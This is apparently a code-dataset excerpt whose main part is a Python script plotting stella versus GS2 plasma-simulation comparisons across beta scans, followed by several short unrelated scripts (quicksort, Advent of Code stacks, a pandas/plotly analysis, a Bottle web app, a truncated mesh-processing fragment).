sim_gs2_b03,\n #sim_gs2_b03_hvr,\n ],\n [\n \"stella\",\n \"gs2\",\n # \"gs2, hvr\",\n ],\n IMAGE_DIR + \"beta=0.03_poster\",\n sim_types=[\n \"stella\",\n \"gs2\",\n #\"gs2\",\n ],\n\n )\n\n\n #compare_omega_for_fbpar0_changing_streaming_and_drive()\n\n return\n\ndef plot_fbpar0_beta0001_equal_masses():\n \"\"\"Compare sims, all with fbpar=0, fapar=1, beta=0.001, for which\n we try turning on and off different knobs.\"\"\"\n\n make_comparison_plots([\n sim_st_b001_fbpar0,\n sim_gs2_b001_fbpar0,\n sim_st_b001_fbpar0_equal_masses,\n sim_gs2_b001_fbpar0_equal_masses,\n ],\n [\n \"stella\",\n \"GS2\",\n \"stella, m_e=1\",\n \"GS2, m_e=1\",\n ],\n \"./termsoff_beta_0.001_fbpar0_me1\",\n sim_types=[\n \"stella\",\n \"gs2\",\n \"stella\",\n \"gs2\",\n ],\n plot_apar=True,\n plot_format=\".eps\"\n )\n return\n\ndef analyse_fbpar0_results():\n \"\"\"Compare omega(t) and phi(z), apar(z)\n between GS2 and stella results \"\"\"\n\n print(\"Hello world\")\n beta_strs = [\n\n ]\n stella_sim_longnames = [\n\n ]\n gs2_sim_longnames = [\n\n ]\n for beta_idx in range(0, len(beta_strs)):\n stella_sim_longname = stella_sim_longnames[beta_idx]\n gs2_sim_longname = gs2_sim_longnames[beta_idx]\n beta_str = beta_strs[beta_idx]\n make_comparison_plots([\n stella_sim_longname,\n gs2_sim_longname,\n ],\n [\n \"stella\",\n \"GS2\",\n ],\n \"./beta_\" + beta_str + \"_fbpar0\",\n sim_types=[\n \"stella\",\n \"gs2\",\n ],\n plot_apar=True,\n )\n return\n\ndef analyse_fapar0_results():\n \"\"\"Compare omega(t) and phi(z), apar(z)\n between GS2 and stella results \"\"\"\n\n print(\"Hello world\")\n beta_strs = [\n \"0.00001\",\n \"0.001\",\n \"0.002\",\n #\"0.010\",\n ]\n stella_sim_longnames = [\n\n ]\n gs2_sim_longnames = [\n\n ]\n for beta_idx in range(0, len(beta_strs)):\n stella_sim_longname = stella_sim_longnames[beta_idx]\n gs2_sim_longname = gs2_sim_longnames[beta_idx]\n beta_str = beta_strs[beta_idx]\n 
make_comparison_plots([\n stella_sim_longname,\n gs2_sim_longname,\n ],\n [\n \"stella\",\n \"GS2\",\n ],\n \"./beta_\" + beta_str + \"_fapar0\",\n sim_types=[\n \"stella\",\n \"gs2\",\n ],\n plot_bpar=True,\n plot_format=\".png\"\n )\n # plot_gmvus(\"stella_beta0.001_fapar0/input.out.nc\")\n print(\"stella_sim_longname = \", stella_sim_longname)\n print(\"gs2_sim_longname = \", gs2_sim_longname)\n gs2_bpar_ratio = find_bpar_phi_ratio(gs2_sim_longname, \"gs2\")\n stella_bpar_ratio = find_bpar_phi_ratio(stella_sim_longname, \"stella\")\n print(\"gs2_bpar_ratio = \", gs2_bpar_ratio)\n print(\"stella_bpar_ratio2 = \", stella_bpar_ratio)\n\n return\n\ndef analyse_fapar0_changing_vpares():\n \"\"\"Compare omega(t) and phi(z), apar(z)\n between GS2 and stella results \"\"\"\n\n print(\"Hello world\")\n\n stella_sim1_longname = \"stella_beta0.010_fapar0/input\"\n stella_sim2_longname = \"stella_beta0.010_fapar0_higher_vpa/input\"\n\n gs2_sim1_longname = \"gs2_beta_scan_fapar0/_0.0100\"\n\n # make_comparison_plots([\n # stella_sim1_longname,\n # stella_sim2_longname,\n # gs2_sim1_longname\n # ],\n # [\n # \"stella\",\n # \"stella, higher vpa\",\n # \"GS2\",\n # ],\n # \"./beta_0.01_fapar0_varying_vpares\",\n # sim_types=[\n # \"stella\",\n # \"stella\",\n # \"gs2\",\n # ],\n # plot_bpar=True,\n # )\n #\n gs2_bpar_ratio = find_bpar_phi_ratio(gs2_sim1_longname, \"gs2\")\n stella_bpar_ratio1 = find_bpar_phi_ratio(stella_sim1_longname, \"stella\")\n stella_bpar_ratio2 = find_bpar_phi_ratio(stella_sim2_longname, \"stella\")\n print(\"gs2_bpar_ratio = \", gs2_bpar_ratio)\n print(\"stella_bpar_ratio1 = \", stella_bpar_ratio1)\n print(\"stella_bpar_ratio2 = \", stella_bpar_ratio2)\n # plot_gmvus(\"stella_beta0.001_fapar0/input.out.nc\", which=\"gvpa\")\n # plot_gmvus(\"stella_beta0.010_fapar0_higher_vpa/input.out.nc\", which=\"gvpa\")\n return\n\ndef plot_g():\n \"\"\" \"\"\"\n stella_outnc_longname = \"stella_beta0.001_fbpar0/input.out.nc\"\n gs2_outnc_longname = \"gs2_beta_scan_fbpar0/_0.0010.out.nc\"\n #view_ncdf_variables(stella_outnc_longname)\n #view_ncdf_variables(gs2_outnc_longname)\n plot_gmvus(stella_outnc_longname)\n\n sys.exit()\n\n time, theta, gs2_energy, gs2_lambda = extract_data_from_ncdf(gs2_outnc_longname,\n 't', 'theta', 'energy', 'lambda')\n print(\"len(time), len(theta), len(energy), len(lambda) = \", len(time), len(theta), len(gs2_energy), len(gs2_lambda))\n gs2_g = np.loadtxt(\"gs2_beta_scan_fbpar0/_0.0100.dist\", skiprows=1)\n print(\"gs2_g.shape = \", gs2_g.shape)\n # GS2's g is in a set of (n(energy)*n(lambda)) x 8 blocks.\n # Each row is vpa, vpe, energy(ie,is), al(il), xpts(ie,is), ypts(il), real(gtmp(1)), real(gtmp(2))\n # The number of blocks is nstep/(nwrite*nwrite_mul)\n block_size = len(gs2_energy) * len(gs2_lambda)\n nblocks = len(gs2_g)/block_size\n final_step_g = gs2_g[-block_size:, :]\n print(\"len(final_step_g), block_size = \", len(final_step_g), block_size)\n\n ## Code to plot g for GS2\n # gvmus = gvmus[-1] # spec, mu, vpa\n # fig = plt.figure()\n # ax1 = fig.add_subplot(211)\n # ax2 = fig.add_subplot(212)\n # counter=0\n #\n # for mu_idx in range(0, len(mu)):\n # counter += 1\n # g_ion_vpa = gvmus[0, mu_idx, :]\n # g_electron_vpa = gvmus[1, mu_idx, :]\n # ax1.plot(vpa, g_ion_vpa)\n # ax2.plot(vpa, g_electron_vpa)\n #\n # if counter == 5:\n # plt.show()\n # fig = plt.figure()\n # ax1 = fig.add_subplot(211)\n # ax2 = fig.add_subplot(212)\n # counter=0\n #\n # plt.show()\n\n return\n\ndef plot_geometry():\n \"\"\" \"\"\"\n stella_outnc_longname = 
\"stella_beta0.001_fbpar0/input.out.nc\"\n gs2_outnc_longname = \"gs2_beta_scan_fbpar0/_0.0010.out.nc\"\n\n z, gds2, gds21, gds22, bmag, gradpar = extract_data_from_ncdf(stella_outnc_longname,\n 'zed', 'gds2', 'gds21', 'gds22', 'bmag', 'gradpar')\n\n # Code to compare geometry between stella and gs2\n fig = plt.figure()\n ax1 = fig.add_subplot(211)\n ax2 = fig.add_subplot(212)\n ax1.plot(z, gds2)\n ax1.plot(z, gds21)\n ax1.plot(z, gds22)\n ax2.plot(z, bmag)\n ax2.plot(z, gradpar)\n\n theta, gds2, gds21, gds22, bmag, gradpar = extract_data_from_ncdf(gs2_outnc_longname,\n 'theta', 'gds2', 'gds21', 'gds22', 'bmag', 'gradpar')\n ax1.plot(theta, gds2, linestyle=\"-.\")\n ax1.plot(theta, gds21, linestyle=\"-.\")\n ax1.plot(theta, gds22, linestyle=\"-.\")\n ax2.plot(theta, bmag, linestyle=\"-.\")\n ax2.plot(theta, gradpar, linestyle=\"-.\")\n\n\n plt.show()\n\n return\n\ndef plot_beta_scans():\n \"\"\" \"\"\"\n stella_sim_longnames = [\n sim_st_b0,\n sim_st_b005,\n sim_st_b01,\n sim_st_b015,\n sim_st_b02,\n sim_st_b025,\n sim_st_b03,\n ]\n gs2_sim_longnames = [\n\n ]\n stella_beta_vals = [\n 0.0,\n 0.005,\n 0.01,\n 0.015,\n 0.02,\n 0.025,\n 0.03\n ]\n\n\n make_beta_scan_plots(stella_sim_longnames,\n stella_beta_vals,\n \"images/test_cbc_beta_scan\",\n )\n\n # stella_sim_longnames = [\n #\n # ]\n # stella_beta_vals = [\n # 0.0,\n # 0.001,\n # 0.002,\n # 0.003,\n # 0.004,\n # 0.005,\n # ]\n #\n #\n #\n # make_beta_scan_plots(stella_sim_longnames,\n # stella_beta_vals,\n # \"./test_cbc_beta_scan_fbpar0\",\n # gs2_pickle=gs2_pickle\n # )\n return\n\ndef compare_vres_fbpar0():\n \"\"\" \"\"\"\n stella_sim_longname = \"stella_beta0.010_fbpar0/input\"\n stella_sim_longname_higher_vpa = \"stella_beta0.010_fbpar0_higher_vpa/input\"\n stella_outnc_longname = stella_sim_longname + \".out.nc\"\n stella_outnc_longname_higher_vpa = stella_sim_longname_higher_vpa + \".out.nc\"\n make_comparison_plots([\n stella_sim_longname,\n stella_sim_longname_higher_vpa,\n ],\n [\n \"nvgrid=36\",\n \"nvgrid=108\",\n ],\n \"./beta0.01_fbpar0_vpa_res_test\",\n sim_types=[\n \"stella\",\n \"stella\",\n ],\n plot_apar=True,\n )\n return\n\ndef compare_omega_for_fbpar0_zero_drive():\n \"\"\" \"\"\"\n\n make_comparison_plots([\n sim_st_b001_fbpar0_no_drive,\n sim_st_b001_fbpar0_no_drive_mid_vres,\n #sim_st_b001_fbpar0_no_drive_higher_vres,\n sim_st_b001_fbpar0_no_drive_lower_dt,\n sim_gs2_b001_fbpar0,\n ],\n [\n \"stella, zero drive\",\n \"stella, zero drive, mid vres\",\n #\"stella, zero drive, higher vres\",\n \"stella, zero drive, lower dt\",\n \"GS2\",\n ],\n IMAGE_DIR + \"fbpar0_beta1e-3_zerodrive\",\n sim_types=[\n \"stella\",\n \"stella\",\n \"stella\",\n #\"stella\",\n \"gs2\",\n ],\n plot_apar=True,\n plot_bpar=False,\n plot_format=\".png\"\n )\n\ndef compare_omega_for_fbpar0_zero_drive_change_upwind():\n \"\"\" \"\"\"\n\n make_comparison_plots([\n sim_st_b001_fbpar0_no_drive,\n sim_st_b001_fbpar0_no_drive_0_upwind,\n sim_st_b001_fbpar0_no_drive_01_upwind,\n sim_st_b001_fbpar0_no_drive_02_upwind,\n sim_gs2_b001_fbpar0,\n ],\n [\n \"stella, zero drive\",\n \"stella, zero drive, z & vpa upwind=0\",\n \"stella, zero drive, z & vpa upwind=0.1\",\n \"stella, zero drive, z & vpa upwind=0.2\",\n \"GS2\",\n ],\n IMAGE_DIR + \"fbpar0_beta1e-3_zerodrive_scan_upwind\",\n sim_types=[\n \"stella\",\n \"stella\",\n \"stella\",\n \"stella\",\n \"gs2\",\n ],\n plot_apar=True,\n plot_bpar=False,\n plot_format=\".png\"\n )\n\ndef compare_omega_for_fbpar0_changing_streaming_and_drive():\n \"\"\" \"\"\"\n make_comparison_plots([\n 
sim_st_b001_fbpar0,\n sim_st_b001_fbpar0_no_drive,\n sim_st_b001_fbpar0_no_stream_no_mirror,\n sim_st_b001_fbpar0_no_drive_no_stream_no_mirror,\n sim_st_b001_fbpar0_no_drive_no_drifts\n ],\n [\n \"stella\",\n \"stella, zero drive\",\n \"stella, zero streaming & mirror\",\n \"stella, zero drive, zero streaming & mirror\",\n \"stella, zero drive, zero drifts\",\n ],\n IMAGE_DIR + \"fbpar0_beta1e-3_zerodrive_change_str_mirr\",\n sim_types=[\n \"stella\",\n \"stella\",\n \"stella\",\n \"stella\",\n \"stella\",\n ],\n plot_apar=True,\n plot_bpar=False,\n plot_format=\".png\", show_fig=True\n )\n\ndef compare_beta03():\n \"\"\" \"\"\"\n make_comparison_plots([\n sim_st_b03,\n sim_gs2_b03,\n sim_gs2_b03_hvr,\n ],\n [\n \"stella\",\n \"gs2\",\n \"gs2, higher vres\",\n ],\n IMAGE_DIR + \"beta=0.03\",\n sim_types=[\n \"stella\",\n \"gs2\",\n \"gs2\",\n ],\n plot_apar=True,\n plot_bpar=True,\n plot_format=\".png\", show_fig=True\n )\n\ndef compare_beta03_detailed():\n \"\"\" \"\"\"\n\n fig = plt.figure()\n ax1 = fig.add_subplot(211)\n ax2 = fig.add_subplot(212, sharex=ax1)\n\n sim_gs2_b03_outnc = sim_gs2_b03 + \".out.nc\"\n theta, gds2, gds21, gds22, bmag, gradpar = extract_data_from_ncdf(sim_gs2_b03_outnc,\n 'theta', 'gds2', 'gds21', 'gds22', 'bmag', 'gradpar')\n ax1.plot(theta/np.pi, gds2, c=\"black\")\n ax1.plot(theta/np.pi, gds21, ls=\"--\", c=\"black\")\n ax1.plot(theta/np.pi, gds22, ls=\"-.\", c=\"black\")\n ax2.plot(theta/np.pi, bmag, c=\"black\")\n ax2.plot(theta/np.pi, gradpar, ls=\"--\", c=\"black\")\n\n sim_st_b03_outnc = sim_st_b03 + \".out.nc\"\n theta, gds2, gds21, gds22, bmag, gradpar = extract_data_from_ncdf(sim_st_b03_outnc,\n 'zed', 'gds2', 'gds21', 'gds22', 'bmag', 'gradpar')\n ax1.plot(theta/np.pi, gds2, c=\"red\")\n ax1.plot(theta/np.pi, gds21, ls=\"--\", c=\"red\")\n ax1.plot(theta/np.pi, gds22, ls=\"-.\", c=\"red\")\n ax2.plot(theta/np.pi, bmag, c=\"red\")\n ax2.plot(theta/np.pi, gradpar, ls=\"--\", c=\"red\")\n\n plt.show()\n\n make_comparison_plots([\n sim_st_b03,\n sim_gs2_b03,\n ],\n [\n \"stella\",\n \"gs2\",\n ],\n IMAGE_DIR + \"beta=0.03\",\n sim_types=[\n \"stella\",\n \"gs2\",\n ],\n plot_apar=True,\n plot_bpar=True,\n plot_format=\".png\", show_fig=False\n )\n make_comparison_plots([\n sim_st_b03_fbpar0,\n sim_gs2_b03_fbpar0,\n ],\n [\n \"stella\",\n \"gs2\",\n ],\n IMAGE_DIR + \"beta=0.03_fbpar0\",\n sim_types=[\n \"stella\",\n \"gs2\",\n ],\n plot_apar=True,\n plot_bpar=False,\n plot_format=\".png\", show_fig=False\n )\n make_comparison_plots([\n sim_st_b03_fapar0,\n sim_gs2_b03_fapar0,\n ],\n [\n \"stella\",\n \"gs2\",\n ],\n IMAGE_DIR + \"beta=0.03_fapar0\",\n sim_types=[\n \"stella\",\n \"gs2\",\n ],\n plot_apar=False,\n plot_bpar=True,\n plot_format=\".png\", show_fig=False\n )\n return\n\ndef plot_g_for_fbpar0_different_terms_off():\n \"\"\"Take a look at the distribrution function for\n fbpar=0 sims with beta=1e-3 and various terms on/off \"\"\"\n\n stella_outnc_longname = sim_st_b001_fbpar0 + \".out.nc\"\n stella_outnc_longname_no_mirror = sim_st_b001_fbpar0_no_mirror + \".out.nc\"\n\n plot_gmvus(stella_outnc_longname)\n plot_gzvs(stella_outnc_longname)\n print(\"Now no mirror:\")\n plot_gmvus(stella_outnc_longname_no_mirror)\n plot_gzvs(stella_outnc_longname_no_mirror)\n\n\n return\n\ndef plot_gzvs_for_fbpar0():\n \"\"\"Take a look at the distribrution function for\n fbpar=0 sims \"\"\"\n\n stella_sim_longname = \"stella_beta0.010_fbpar0/input\"\n stella_outnc_longname = stella_sim_longname + \".out.nc\"\n plot_gzvs(stella_outnc_longname)\n\n\n return\n\ndef 
make_comparison_plots_many(stella_sim_longnames, gs2_sim_longnames,\n beta_strs, prefix, plot_apar = False,\n plot_bpar = False, plot_format=\".png\"):\n \"\"\" \"\"\"\n\n for beta_idx in range(0, len(beta_strs)):\n stella_sim_longname = stella_sim_longnames[beta_idx]\n gs2_sim_longname = gs2_sim_longnames[beta_idx]\n beta_str = beta_strs[beta_idx]\n make_comparison_plots([\n stella_sim_longname,\n gs2_sim_longname,\n ],\n [\n \"stella\",\n \"GS2\",\n ],\n IMAGE_DIR + prefix + \"beta_\" + beta_str,\n sim_types=[\n \"stella\",\n \"gs2\",\n ],\n plot_apar=plot_apar,\n plot_bpar=plot_bpar,\n plot_format=plot_format\n )\n\ndef plot_fapar_fbpar_on():\n \"\"\" \"\"\"\n ## Beta scan\n stella_sim_longnames = [\n sim_st_b0,\n sim_st_b005,\n sim_st_b01,\n sim_st_b015,\n sim_st_b02,\n sim_st_b025,\n sim_st_b03\n ]\n stella_beta_vals = [\n 0.,\n 0.005,\n 0.01,\n 0.015,\n 0.02,\n 0.025,\n 0.03,\n ]\n stella_labels = [\n \"beta=0.\",\n \"beta=0.005\",\n \"beta=0.01\",\n \"beta=0.015\",\n \"beta=0.02\",\n \"beta=0.025\",\n \"beta=0.03\",\n ]\n make_comparison_plots(stella_sim_longnames,\n stella_labels,\n \"images/omega_beta_scan/fapar1_fbpar1_beta_scan\",\n plot_apar=True, plot_bpar=True, plot_format=\".eps\")\n\n make_beta_scan_plots(stella_sim_longnames,\n [],\n stella_beta_vals,\n IMAGE_DIR + \"test_cbc_beta_scan\",\n gs2_pickle=pickle_gs2)\n\n return\n\ndef plot_fapar0():\n \"\"\" \"\"\"\n stella_sim_longnames = [\n sim_st_b00001_fapar0,\n sim_st_b001_fapar0,\n sim_st_b002_fapar0,\n sim_st_b01_fapar0,\n ]\n gs2_sim_longnames = [\n sim_gs2_b00001_fapar0,\n sim_gs2_b001_fapar0,\n sim_gs2_b002_fapar0,\n sim_gs2_b01_fapar0\n ]\n beta_strs = [\n \"0.00001\",\n \"0.001\",\n \"0.002\",\n \"0.01\"\n ]\n # make_comparison_plots_many(stella_sim_longnames,\n # gs2_sim_longnames,\n # beta_strs, \"fapar=0/\", plot_apar=False, plot_bpar=True)\n\n make_beta_scan_plots(stella_sim_longnames,\n gs2_sim_longnames,\n beta_strs,\n IMAGE_DIR + \"test_cbc_beta_scan_fapar0\",\n )\n\n return\n\ndef plot_fbpar0():\n \"\"\" \"\"\"\n stella_sim_longnames = [\n sim_st_b00001_fbpar0,\n sim_st_b00005_fbpar0,\n sim_st_b0001_fbpar0,\n sim_st_b0003_fbpar0,\n sim_st_b0006_fbpar0,\n #sim_st_b001_fbpar0,\n sim_st_b0015_fbpar0,\n sim_st_b002_fbpar0,\n sim_st_b003_fbpar0,\n sim_st_b004_fbpar0,\n sim_st_b005_fbpar0,\n sim_st_b01_fbpar0\n ]\n\n gs2_sim_longnames = [\n sim_gs2_b00001_fbpar0,\n sim_gs2_b001_fbpar0,\n sim_gs2_b001_fbpar0,\n sim_gs2_b001_fbpar0,\n sim_gs2_b001_fbpar0,\n #sim_gs2_b001_fbpar0,\n sim_gs2_b001_fbpar0,\n sim_gs2_b002_fbpar0,\n sim_gs2_b003_fbpar0,\n sim_gs2_b004_fbpar0,\n sim_gs2_b005_fbpar0,\n sim_gs2_b01_fbpar0\n ]\n beta_strs = [\n \"0.00001\",\n \"0.00005\",\n \"0.0001\",\n \"0.0003\",\n \"0.0006\",\n \"0.001\",\n \"0.0015\",\n \"0.002\",\n \"0.003\",\n \"0.004\",\n \"0.005\",\n \"0.01\"\n ]\n # make_comparison_plots_many(stella_sim_longnames,\n # gs2_sim_longnames,\n # beta_strs, \"fbpar=0/\", plot_apar=True, plot_bpar=False)\n make_beta_scan_plots(stella_sim_longnames,\n gs2_sim_longnames,\n beta_strs,\n IMAGE_DIR + \"test_cbc_beta_scan_fbpar0\",\n )\n return\n\ndef plot_fbpar0_with_gs2_pickle():\n \"\"\" \"\"\"\n stella_sim_longnames = [\n sim_st_b00001_fbpar0,\n sim_st_b00005_fbpar0,\n sim_st_b0001_fbpar0,\n sim_st_b0003_fbpar0,\n sim_st_b0006_fbpar0,\n #sim_st_b001_fbpar0,\n sim_st_b0015_fbpar0,\n sim_st_b002_fbpar0,\n sim_st_b003_fbpar0,\n sim_st_b004_fbpar0,\n sim_st_b005_fbpar0,\n sim_st_b01_fbpar0\n ]\n\n gs2_sim_longnames = [\n ]\n beta_strs = [\n \"0.00001\",\n \"0.00005\",\n \"0.0001\",\n 
\"0.0003\",\n \"0.0006\",\n \"0.001\",\n \"0.0015\",\n \"0.002\",\n \"0.003\",\n \"0.004\",\n \"0.005\",\n \"0.01\"\n ]\n # make_comparison_plots_many(stella_sim_longnames,\n # gs2_sim_longnames,\n # beta_strs, \"fbpar=0/\", plot_apar=True, plot_bpar=False)\n make_beta_scan_plots(stella_sim_longnames,\n [],\n beta_strs,\n IMAGE_DIR + \"test_cbc_beta_scan_fbpar0\",\n gs2_pickle=pickle_gs2_fbpar0 )\n return\n\ndef compare_get_fields_subroutines():\n \"\"\" \"\"\"\n make_comparison_plots(\n [\n sim_st_gfvmulo_nstep1000,\n sim_st_gf_nstep1000,\n ],\n [\n \"get_fields_vmulo\",\n \"get_fields\",\n ],\n IMAGE_DIR ,\n sim_types = [\n \"stella\",\n \"stella\",\n ],\n plot_apar=True,\n plot_bpar=True,\n plot_format=\".png\", show_fig=True\n )\n\n\n return\n\ndef make_all_plots():\n \"\"\" \"\"\"\n plot_fbpar0()\n plot_fapar_fbpar_on()\n plot_fapar0()\n compare_omega_for_fbpar0_zero_drive()\n compare_omega_for_fbpar0_zero_drive_change_upwind()\n analyse_fbpar0_beta0001_results()\n\n return\n\n\n\nif __name__ == \"__main__\":\n ## Compare\n\n #analyse_fbpar0_results()\n # plot_beta_scans()\n #analyse_results_for_poster()\n # plot_geometry()\n # make_low_beta_fbpar0_plots()\n # analyse_fapar0_results()\n # plot_gvmus_for_fbpar0()\n # analyse_fapar0_changing_vpares()\n #make_all_plots()\n #plot_gzvs_for_fbpar0()\n # plot_fapar0()\n # plot_fbpar0_with_gs2_pickle()\n # plot_fapar_fbpar_on()\n #plot_geometry()\n #compare_beta03()\n #compare_beta03_detailed()\n # compare_omega_for_fbpar0_changing_streaming_and_drive()\n #analyse_fbpar0_beta0001_results()\n #plot_fbpar0_beta0001_equal_masses()\n #plot_g_for_fbpar0_different_terms_off()\n #compare_omega_for_fbpar0_different_terms_off()\n # compare_omega_for_fbpar0_zero_drive()\n # compare_omega_for_fbpar0_zero_drive_change_upwind()\n #compare_omega_for_fbpar0_changing_streaming_and_drive()\n compare_get_fields_subroutines()\n","repo_name":"rd1042/stella_benchmarking_new","sub_path":"test_cbc_beta_scan/make_plots.py","file_name":"make_plots.py","file_ext":"py","file_size_in_byte":40321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22554733599","text":"import time\nimport random\nstart_time = time.time()\n\na = []\n\nfor i in range(0, 1000):\n num = random.randint(0, 1000)\n a.append(num)\n\ndef quicksort(array):\n if len(array) < 2:\n return array\n else:\n pivot = array[0]\n less = [i for i in array[1:] if i <= pivot]\n\n greater = [i for i in array[1:] if i > pivot]\n\n return quicksort(less) + [pivot] + quicksort(greater)\n\nprint(quicksort(a))\n\nprint(\"Process finished --- %s seconds ---\" % (time.time() - start_time))\n\n","repo_name":"RoukX/python-basic-algorithm","sub_path":"quicksort.py","file_name":"quicksort.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20000860977","text":"import fileinput\n\ndata = open('input.txt', 'r').read().splitlines()\n\nstacks = []\n\nfor i in range(1, len(data[0]) - 1, 4):\n stack = []\n for j, line in enumerate(data):\n if j == 8:\n break\n if line[i] != ' ':\n stack.insert(0, line[i])\n stacks.append(stack)\n\nmoves = data[10:]\n\ndef part_one():\n for move in moves:\n a = move.split(' ')\n a.remove('move')\n a.remove('from')\n a.remove('to')\n a = list(map(int, a))\n for i in range(a[0]):\n container = stacks[a[1] - 1].pop()\n stacks[a[2] - 1].append(container)\n\n for stack in stacks:\n print(stack.pop())\n\ndef part_two():\n for move in moves:\n 
a = move.split(' ')\n a.remove('move')\n a.remove('from')\n a.remove('to')\n a = list(map(int, a))\n \n containers = []\n for i in range(a[0]):\n container = stacks[a[1] - 1].pop()\n containers.insert(0, container)\n stacks[a[2] - 1].extend(containers)\n \n for stack in stacks:\n print(stack.pop())","repo_name":"Meerkoo/AoC2022","sub_path":"05/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13607629601","text":"\"\"\"\nimport os\nimport webapp\n# Change working directory so relative paths (and template lookup) work again\nos.chdir(os.path.dirname(__file__))\n\"\"\"\n\n\nfrom bottle import Bottle, run, static_file, view\nimport utils\n\n\ndef main():\n conf = utils.get_conf()\n\n host = conf[\"bottle\"][\"host\"]\n port = conf[\"bottle\"][\"port\"]\n route_statics = conf[\"bottle\"][\"route_statics\"]\n statics_path = conf[\"bottle\"][\"statics_path\"]\n video_paths = conf[\"bottle\"][\"video_paths\"]\n\n app = Bottle()\n\n if route_statics is True:\n @app.route('/static/')\n def server_static(filepath):\n return static_file(filepath, root=statics_path)\n\n @app.route('/')\n def index():\n return \"Hello World!\"\n\n @app.route('/videos')\n @view('views/videos.tpl')\n def videos():\n tpl_vars = dict()\n tpl_vars[\"video_paths\"] = video_paths\n return tpl_vars\n\n return app, host, port\n\n\n\n\n\n# ... build or import your bottle application here ...\n# Do NOT use bottle.run() with mod_wsgi\napplication, host, port = main()\n","repo_name":"berzelius/powa","sub_path":"wsgi.py","file_name":"wsgi.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33492211817","text":"\nimport pandas as pd\nimport numpy as np\nhs_students = pd.read_csv('https://raw.githubusercontent.com/rfordatascience/tidytuesday/master/data/2021/2021-02-02/hs_students.csv')\nhbcu_all = pd.read_csv('https://raw.githubusercontent.com/rfordatascience/tidytuesday/master/data/2021/2021-02-02/hbcu_all.csv')\n\nhs_students.columns = ['Year', 'Total pop',\n 'Total pop se',\n 'White', 'White se', 'Black',\n 'Black se', 'Hispanic', 'Hispanic se',\n 'Total Apac',\n 'Total Apac se',\n 'Asian',\n 'Asian se',\n 'Pacific',\n 'Pacific se',\n 'Indian Native',\n 'Indian Native se',\n 'Mix race', 'Mix race se']\n\ndf1 = hs_students[['Year', 'Total pop',\n 'White', 'Black',\n 'Hispanic',\n 'Asian',\n 'Pacific',\n 'Indian Native',\n 'Mix race']]\n\n# np.where(condition, value if true, value if false)\ndf1['Year'] = np.where(df1['Year'] >= 10000, round(df1['Year']/10), df1['Year'])\n\ndf1.dropna(axis = 0, how = 'all', inplace = True)\n\n# Rename to make them readable as stubnames\ndf1.columns=['Year', 'Pop_Total', 'Pop_White', 'Pop_Black', 'Pop_Hispanic', 'Pop_Asian', 'Pop_Pacific',\n 'Pop_IndianNative', 'Pop_MixRace']\ndf1 = pd.wide_to_long(df1, stubnames='Pop', i=['Year'], j='Race', sep='_', suffix=r'\\w+')\ndf1 = df1.reset_index()\n\n\n\ndf2=df1.copy()\n\n# Window function on a dataframe \ndf1.Pop = pd.to_numeric(df1.Pop, errors='coerce').fillna(0).astype(int) # working\ndf1['rank_race'] = df1[df1.Pop>0].groupby('Race')['Year'].rank(method='first') # window funciton\ndf1[df1['rank_race']==1]\n\nrace_list = df1[df1['rank_race']==1].Race.to_list()\nyear_list = df1[df1['rank_race']==1].Year.to_list()\npop_list = df1[df1['rank_race']==1].Pop.to_list()\n\nfor yr in year_list:\n 
print(round((yr-1910)/100,1))\n\n\nimport plotly.express as px\n\n# color_list = ['dimgray', 'firebrick', 'olive', 'saddlebrown', 'steelblue', 'seagreen', 'darkviolet', 'crimson']\n\nfig = px.line(df2, x=\"Year\", y=\"Pop\", color='Race') # color='Race'\nannotations=[]\nfor yr,pop,race in zip(year_list,pop_list, race_list):\n annotations.append(dict(xref='paper', x=round((yr-1910)/100,1), y=pop,\n xanchor='right', yanchor='middle',\n text=race + ' {}%'.format(13.5),\n font=dict(family='Arial',\n size=12,color='black'),\n showarrow=False))\nfig.update_layout(annotations=annotations)\nfig.update_layout(\n autosize=False,\n width=950,\n height=1100,\n showlegend=False,\n #legend_title=\"Legend Title\",\n title=\"High school completion among persons age 25 and over\",\n xaxis_title=\"Year\",\n yaxis_title=\"Percent of population (persons age 25 and over)\",\n )\n#fig.write_image(\"2021-02-02/fig1.png\")\nfig.show()\n\n\n# df1 = df1.replace({ \"-\": np.nan, \"&\": np.nan })\n\n'''\n# wide to long format\ndf = pd.DataFrame({\n 'famid': [1, 1, 1, 2, 2, 2, 3, 3, 3],\n 'birth': [1, 2, 3, 1, 2, 3, 1, 2, 3],\n 'hta': [2.8, 2.9, 2.2, 2, 1.8, 1.9, 2.2, 2.3, 2.1],\n 'htb': [3.4, 3.8, 2.9, 3.2, 2.8, 2.4, 3.3, 3.4, 2.9]\n})\npd.wide_to_long(df, stubnames='ht', i=['famid', 'birth'], j='age')\n# above examples have integers as suffixes. It is possible to have non-integers as suffixes.\ndf = pd.DataFrame({\n 'famid': [1, 1, 1, 2, 2, 2, 3, 3, 3],\n 'birth': [1, 2, 3, 1, 2, 3, 1, 2, 3],\n 'ht_one': [2.8, 2.9, 2.2, 2, 1.8, 1.9, 2.2, 2.3, 2.1],\n 'ht_two': [3.4, 3.8, 2.9, 3.2, 2.8, 2.4, 3.3, 3.4, 2.9]\n})\npd.wide_to_long(df, stubnames='ht', i=['famid', 'birth'], j='age', sep='_', suffix=r'\\w+')\n'''\n\n","repo_name":"vivekparasharr/Challenges-and-Competitions","sub_path":"TidyTuesday/20210202-hbcu-enrollment.py","file_name":"20210202-hbcu-enrollment.py","file_ext":"py","file_size_in_byte":3632,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"20356029910","text":"import vedo\nfrom omegaconf import OmegaConf\nimport torch\nimport numpy as np\nfrom utils import get_graph_feature\nfrom utils import centring\n\n\ndef gen_metadata_inf(cfg: OmegaConf, mesh: vedo.Mesh, device='cuda'):\n mesh = centring(mesh)\n N = mesh.ncells\n points = vedo.vtk2numpy(mesh.polydata().GetPoints().GetData())\n ids = vedo.vtk2numpy(mesh.polydata().GetPolys().GetData()).reshape((N, -1))[:,1:]\n cells = points[ids].reshape(N, 9).astype(dtype='float32')\n normals = 